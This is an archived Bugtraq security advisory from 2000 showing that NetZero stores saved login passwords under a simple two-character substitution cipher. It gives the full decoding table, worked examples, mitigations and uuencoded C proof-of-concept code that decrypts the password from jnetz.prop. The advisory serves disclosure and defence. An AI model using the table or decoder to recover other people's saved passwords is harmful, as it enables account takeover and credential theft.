Bugtraq mailing list archives
@stake Security Advisory: NetZero Password Algorithm
From: bcarrier () ATSTAKE COM (Brian Carrier)
Date: Tue, 18 Jul 2000 10:30:38 -0400
@Stake Inc. L0pht Research Labs www.atstake.com www.L0pht.com Security Advisory Advisory Name: NetZero Password Encryption Algorithm Release Date: 07.18.2000 Application: NetZero V3.0 and earlier Platform: Microsoft Windows 95, 98, NT, 2000 Severity: Low. Passwords can be easily decrypted by exploiting NetZero's encryption algorithm Author: Brian Carrier [bcarrier () atstake com] Vendor Status: Vendor Contacted 6.19.00 Web: http://www.L0pht.com/advisories.html Forward: It is unfortunately common practice that applications which allow users to remember their passwords as a convenience rarely encrypt them but instead opt to simply obfuscate them. This does not alter the fact that user perception and expectation, for the majority of users at least, is often incorrectly set. Often times convenience eschews security in these products. There are dozens of applications available that make this same mistake. This advisory is not an attempt to single one vendor out but rather continue to remind of the common problem of storing secrets and the reliance of simple obfuscation. If effort is taken to obfuscate or hide something then it must have been seen as valuable to someone. If not, why bother? Much the way buffer overflows abound so do simple obfuscation mechanisms. As such, it is important to continue to bring them to light. Unfortunately it is often the case that the average user places as much trust in these as stronger systems through the apparent similarity in user interface. As suggested by Aleph1, the MS CryptoAPI CryptoProectetData() and CryptUnprotectData() functions currently allow applications to store secrets encrypted, based on the user's credentials. Therefore, since the methods currently exist for secure data storage, they should be utilized by all applications to provide users with a consistent level of protection. This advisory is designed to help people see ways of looking at, and for, these sorts of problems. Or even in being aware of the situation, to view it as a non-problem. Teaching someone to fish rather than simply providing one meal. Enjoy the classical substitution cipher :) Overview: NetZero is a service that provides free Internet access to customers in exchange for the permission to advertise. NetZero's users log into the network with a login and password that are saved in an ASCII text file on the users system. This advisory addresses a weak encryption algorithm that is used to protect the password from unauthorized access. In order for a NetZero account to be compromised, an attacker must have access to the machine or use another vulnerability to read the file. Once access is obtained, the attacker can easily determine the user's NetZero login and password in less than a seconds time. Once the login and password have been determined, the attacker can read the users email and attack other systems under the users identity. This is a common problem in many services of this type. One quick solution to at least minimize the problem, should this risk be deemed unacceptable, is to disable the _Save Password_ option. Detailed Description: The login and password that are required to log into the NetZero network are stored in an ASCII file, id.dat, in the NetZero directory. If the user chooses to have the application save the password, then jnetz.prop also contains the login and password. The password in both files is encrypted using a variation of a simple substitution cipher. The classical substitution cipher is a 1-to-1 mapping between characters where each plaintext character is replaced by one ciphertext character. For example, let P_i be the plaintext character in location 'i' and C_j be the ciphertext character in location 'j', then C_i is the character that P_i maps to. The NetZero substitution cipher replaces each plaintext character by two ciphertext characters, but the two ciphertext characters are not stored together. When substituting character P_i of a password of length 'n', the first ciphertext character is C_i and the second character is C_n+i. The two ciphertext characters are derived from the following table: | 1 a M Q f 7 g T 9 4 L W e 6 y C --+---------------------------------- g | ` a b c d e f g h i j k l m n o T | p q r s t u v w x y z { | } ~ f | @ A B C D E F G H I J K L M N O 7 | P Q R S T U V W X Y Z [ \ ] ^ _ Q | 0 1 2 3 4 5 6 7 8 9 : ; < = > ? M | SP ! " # $ % & ' ( ) * + , - . / The characters inside the table represent the ASCII plaintext characters and SP represents a space. When encrypting a string, P, of length 'n', find each character in the table and place the column header into C_i and place the row header into C_n+i. For example: E(a) = ag E(aa) = aagg E(aqAQ1!) = aaaaaagTf7QM E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg When decrypting a string, C, of length '2n', then P_i will be the element in the above table where the column headed by C_i and the row headed by C_n+i intersect. For example: D(af) = A D(aaff) = AA D(aaMMQQfgfgfg) = AaBbCc Temporary Solution: Exploitation of this vulnerability is only possible once an attacker has gained access to the id.dat or jnetz.prop files. Therefore, NetZero users should not have the application save their password and they should delete the id.dat file every time they start the application. Vendor Response: Vendor has acknowledged receipt of the advisory and has not provided a response as to any actions they intend to take. Proof-of-Concept Code: The following code will demonstrate that the password is easily decrypted. Simply uudecode, compile, and run in a directory that contains jnetz.prop. begin 666 netzero.c M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QS=')I;F<N:#X*"B-D969I M;F4@54E$7U-)6D4)-C0*(V1E9FEN92!005-37T-)4$A%4E]325I%"3$R. HC M9&5F:6YE(%!!4U-?4$Q!24Y?4TE:10DV- HC9&5F:6YE($)51E]325I%(#(U M-@H*8V]N<W0@8VAA<B!D96-486)L95LV75LQ-ET@/2!["B @>R=@)RPG82<L M)V(G+"=C)RPG9"<L)V4G+"=F)RPG9R<L)V@G+"=I)RPG:B<L)VLG+"=L)RPG M;2<L)VXG+"=O)WTL"B @>R=P)RPG<2<L)W(G+"=S)RPG="<L)W4G+"=V)RPG M=R<L)W@G+"=Y)RPG>B<L)WLG+"=\)RPG?2<L)WXG+#!]+ H@('LG0"<L)T$G M+"=")RPG0R<L)T0G+"=%)RPG1B<L)T<G+"=()RPG22<L)THG+"=+)RPG3"<L M)TTG+"=.)RPG3R=]+ H@('LG4"<L)U$G+"=2)RPG4R<L)U0G+"=5)RPG5B<L M)U<G+"=8)RPG62<L)UHG+"=;)RPG7%PG+"==)RPG7B<L)U\G?2P*("![)S G M+"<Q)RPG,B<L)S,G+"<T)RPG-2<L)S8G+"<W)RPG."<L)SDG+"<Z)RPG.R<L M)SPG+"<])RPG/B<L)S\G?2P*("![)R G+"<A)RPG(B<L)R,G+"<D)RPG)2<L M)R8G+"=<)R<L)R@G+"<I)RPG*B<L)RLG+"<L)RPG+2<L)RXG+"<O)WT*?3L* M"FEN="!N>E]D96-R>7!T*&-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)? M4TE:15TL( H@(&-H87(@8U!L86EN4&%S<UM005-37U!,04E.7U-)6D5=*0I[ M"@EI;G0@<&%S<TQE;BP@:2P@:61X,2P@:61X,CL*"7!A<W-,96X@/2!S=')L M96XH8T-I<&AE<E!A<W,I+S(["@D*"6EF("AP87-S3&5N(#X@4$%34U]03$%) M3E]325I%*0H)>PH)"7!R:6YT9B@B17)R;W(Z(%!L86EN('1E>'0@87)R87D@ M=&]O('-M86QL7&XB*3L*"0ER971U<FX@,3L*"7T*"@EF;W(@*&D@/2 P.R!I M(#P@<&%S<TQE;CL@:2LK*0H)>PH)"7-W:71C:"AC0VEP:&5R4&%S<UMI72D* M"0E["@D)8V%S92 G,2<Z"@D)"6ED>#(@/2 P.R!B<F5A:SL*"0EC87-E("=A M)SH*"0D):61X,B ](#$[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@R(#T@ M,CL@8G)E86L["@D)8V%S92 G42<Z"@D)"6ED>#(@/2 S.R!B<F5A:SL*"0EC M87-E("=F)SH*"0D):61X,B ](#0[(&)R96%K.PH)"6-A<V4@)S<G.@H)"0EI M9'@R(#T@-3L@8G)E86L["@D)8V%S92 G9R<Z"@D)"6ED>#(@/2 V.R!B<F5A M:SL*"0EC87-E("=4)SH*"0D):61X,B ](#<[(&)R96%K.PH)"6-A<V4@)SDG M.@H)"0EI9'@R(#T@.#L@8G)E86L["@D)8V%S92 G-"<Z"@D)"6ED>#(@/2 Y M.R!B<F5A:SL*"0EC87-E("=,)SH*"0D):61X,B ](#$P.R!B<F5A:SL*"0EC M87-E("=7)SH*"0D):61X,B ](#$Q.R!B<F5A:SL*"0EC87-E("=E)SH*"0D) M:61X,B ](#$R.R!B<F5A:SL*"0EC87-E("<V)SH*"0D):61X,B ](#$S.R!B M<F5A:SL*"0EC87-E("=Y)SH*"0D):61X,B ](#$T.R!B<F5A:SL*"0EC87-E M("=#)SH*"0D):61X,B ](#$U.R!B<F5A:SL*"0ED969A=6QT.@H)"0EP<FEN M=&8H(D5R<F]R.B!5;FMN;W=N($-I<&AE<B!497AT(&EN9&5X.B E8UQN(BP@ M8T-I<&AE<E!A<W-;:5TI.PH)"0ER971U<FX@,3L*"0D)8G)E86L["@D)?0H* M"0ES=VET8V@H8T-I<&AE<E!A<W-;:2MP87-S3&5N72D*"0E["@D)8V%S92 G M9R<Z"@D)"6ED>#$@/2 P.R!B<F5A:SL*"0EC87-E("=4)SH*"0D):61X,2 ] M(#$[(&)R96%K.PH)"6-A<V4@)V8G.@H)"0EI9'@Q(#T@,CL@8G)E86L["@D) M8V%S92 G-R<Z"@D)"6ED>#$@/2 S.R!B<F5A:SL*"0EC87-E("=1)SH*"0D) M:61X,2 ](#0[(&)R96%K.PH)"6-A<V4@)TTG.@H)"0EI9'@Q(#T@-3L@8G)E M86L["@D)9&5F875L=#H*"0D)<')I;G1F*")%<G)O<CH@56YK;F]W;B!#:7!H M97(@5&5X="!3970Z("5C7&XB+" *"0D)("!C0VEP:&5R4&%S<UMI*W!A<W-, M96Y=*3L*"0D)<F5T=7)N(#$["@D)"6)R96%K.PH)"7T*"@D)8U!L86EN4&%S M<UMI72 ](&1E8U1A8FQE6VED>#%=6VED>#)=.PH)?0H)8U!L86EN4&%S<UMI M72 ](# ["@H)<F5T=7)N(# ["GT*"FEN="!M86EN*'9O:60I"GL*"49)3$4@ M*FA087)A;7,["@EC:&%R(&-"=69F97);0E5&7U-)6D5=+"!C54E$6U5)1%]3 M25I%73L*"6-H87(@8T-I<&AE<E!A<W-;4$%34U]#25!(15)?4TE:15TL(&-0 M;&%I;E!A<W-;4$%34U]03$%)3E]325I%73L*"6EN="!D;VYE(#T@,CL*"@EP M<FEN=&8H(EQN3F5T(%IE<F\@4&%S<W=O<F0@1&5C<GEP=&]R7&XB*3L*"7!R M:6YT9B@B0G)I86X@0V%R<FEE<B!;8F-A<G)I97) 871S=&%K92YC;VU=7&XB M*3L*"7!R:6YT9B@B0%-T86ME($PP<&AT(%)E<V5A<F-H($QA8G-<;B(I.PH) M<')I;G1F*")H='1P.B\O=W=W+F%T<W1A:V4N8V]M7&Y<;B(I.PH*"6EF("@H M:%!A<F%M<R ](&9O<&5N*")J;F5T>BYP<F]P(BPB<B(I*2 ]/2!.54Q,*0H) M>PH)"7!R:6YT9B@B56YA8FQE('1O(&9I;F0@:FYE='HN<')O<"!F:6QE7&XB M*3L*"0ER971U<FX@,3L*"7T)"@H)=VAI;&4@*"AF9V5T<RAC0G5F9F5R+"!" M549?4TE:12P@:%!A<F%M<RD@(3T@3E5,3"D@)B8@*&1O;F4@/B P*2D*"7L* M"0EI9B H<W1R;F-M<"AC0G5F9F5R+" B4')O9E5)1#TB+" X*2 ]/2 P*0H) M"7L*"0D)9&]N92TM.PH)"0ES=')N8W!Y*&-5240L(&-"=69F97(@*R X+"!5 M241?4TE:12D["@D)"7!R:6YT9B@B57-E<DE$.B E<R(L(&-5240I.PH)"7T* M"@D):68@*'-T<FYC;7 H8T)U9F9E<BP@(E!R;V905T0](BP@."D@/3T@,"D* M"0E["@D)"61O;F4M+3L*"0D)<W1R;F-P>2AC0VEP:&5R4&%S<RP@8T)U9F9E M<B K(#@L(%!!4U-?0TE02$527U-)6D4I.PH)"0EP<FEN=&8H(D5N8W)Y<'1E M9"!087-S=V]R9#H@)7,B+"!C0VEP:&5R4&%S<RD["@H)"0EI9B H;GI?9&5C M<GEP="AC0VEP:&5R4&%S<RP@8U!L86EN4&%S<RD@(3T@,"D*"0D)"7)E='5R M;B Q.PH)"0EE;'-E"@D)"0EP<FEN=&8H(E!L86EN(%1E>'0@4&%S<W=O<F0Z M("5S7&XB+"!C4&QA:6Y087-S*3L*"0E]"@H)?0H*"69C;&]S92AH4&%R86US M*3L*"@EI9B H9&]N92 ^(# I"@E["@D)<')I;G1F*"));G9A;&ED(&IN971Z M+G!R;W @9FEL95QN(BD["@D)<F5T=7)N(#$["@E](&5L<V4@>PH)"7)E='5R *;B P.PH)?0I]"EQN end bcarrier () atstake com [ For more advisories check out http://www.l0pht.com/advisories.html ] L-ZERO-P-H-T
Current thread:
- Trustix Security Advisory - nfs-utils, (continued)
- Trustix Security Advisory - nfs-utils Oystein Viggen (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Andrea Costantino (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Matt Wilson (Jul 18)
- Update on TooRcon Computer Security Expo Ben (Jul 18)
- "Best Practices for Secure Web Development" whitepaper Razvan Peteanu (Jul 18)
- [Security Announce] MDKSA-2000:021 nfs-utils update Linux Mandrake Security Team (Jul 18)
- Microsoft Security Bulletin (MS00-043) Microsoft Product Security (Jul 19)
- Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability Ussr Labs (Jul 19)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Joe Laffey (Jul 18)
- Re: [RHSA-2000:043-02] Updated package for nfs-utils available Kurt Seifried (Jul 18)
- @stake Security Advisory: NetZero Password Algorithm Brian Carrier (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Dan Kaminsky (Jul 18)
- Re: @stake Security Advisory: NetZero Password Algorithm Damien Miller (Jul 20)
- Multiple bugs in Alibaba 2.0 Prizm (Jul 18)
- Buffer Overflow in MS Outlook Email Clients Aaron Drew (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients bednar () RAK ISTERNET SK (Jul 18)
- Re: Buffer Overflow in MS Outlook Email Clients chris.paget () ANALYSYS COM (Jul 19)
- Re: Buffer Overflow in MS Outlook Email Clients Elias Levy (Jul 21)